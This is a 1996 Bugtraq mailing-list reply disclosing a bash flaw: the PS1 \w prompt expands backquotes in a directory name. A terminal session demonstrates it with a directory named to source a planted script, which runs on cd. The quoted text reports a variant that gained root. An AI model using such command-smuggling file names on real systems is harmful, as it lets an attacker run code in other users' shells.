[3371] in bugtraq
Re: tee see shell problems
daemon@ATHENA.MIT.EDU (Oleg Girko)
Tue Sep 17 11:54:30 1996
Date: Tue, 17 Sep 1996 14:47:29 +0400
Reply-To: Oleg Girko <ol@niif.ru>
From: Oleg Girko <ol@niif.ru>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <m1bloea2ror.fsf@blackbird.mitre.org>
Hello people!
On Mon, 16 Sep 1996, David S. Goldberg wrote:
> > I just tested a variation of this exploit with bash 1.14.6(1)
> > running on Linux 2.0.13. By using my variation I managed to become
> > root. I find this frightening. In my variation I wasn't as subtle.
> > To use a large portion of the original exploit. Hopefully things
> > like this won't happen, but it is possible. I know that I will
> > forever be much more careful when cd'ing from now on. This is a
> > very simplistic example, but I am sure more difficult ones can be
> > devised.
>
> I tried the same with bash 1.14.6(1) on Solaris 2.5 (sparc, though
> theoretically it shouldn't matter), SunOS 4.1.4, BSDI 2.0.1 and IRIX
> 5.3, and was unable to perform the exploit using the * wildcard
> expansion (if I typed in the directory name with the backquote's
> directly, it did work, which I would expect). I ran bash under truss
> (on Solaris) and sure enough, the backquote expansion is simply not
> done. The * expansion generates the backquoted file name, which is
> passed to chdir. I was able to perform this exploit with tcsh 6.05 on
> all the above platforms, but not with tcsh 6.04. I don't know why it
> worked for bash under linux, but I don't have a linux box available to
> me to check it out.
There is problem in \w substitution in command prompt. Look at this:
ol@snark:~ (0/286) cd /tmp
ol@snark:/tmp (0/287) echo $PS1
\u@\h:\w (0/\!)
ol@snark:/tmp (0/288) mkdir '`. .xxx`'
ol@snark:/tmp (0/289) cat > '`. .xxx`'/.xxx
#!/bin/sh
echo 'YOU LOOSE!!!'
ol@snark:/tmp (0/290) cd '`. .xxx`'
ol@snark:/tmp/YOU LOOSE!!! (0/291) echo $BASH_VERSION
1.14.6(1)
ol@snark:/tmp/YOU LOOSE!!! (0/292) uname -a
SunOS snark 5.5 Generic sun4m sparc SUNW,SPARCstation-20
ol@snark:/tmp/YOU LOOSE!!! (0/293)
__
/ )/ Oleg Girko, sys admin in SPb Univ. Physics Inst. Comp. Centre
(__/(_, Email: ol@niif.spb.su Phone: +7 (812) 428 45 27
http://www.niif.spb.su/~ol/ In some MUDS is known as Luarvic
GCM/CS d--(x) H++ s:+> !g p?(3) !au>* a25 w(+) v C++ UB++++$ UL++++$
UU++++$ US++++$ P+ L+ 3++>+++ E N+ K- W-- M-- V- -po+ Y !t !5
!j R G? !tv b+>++ D+ B? e++ u+ h- f+ r->+++ n+ y+(-)>+++
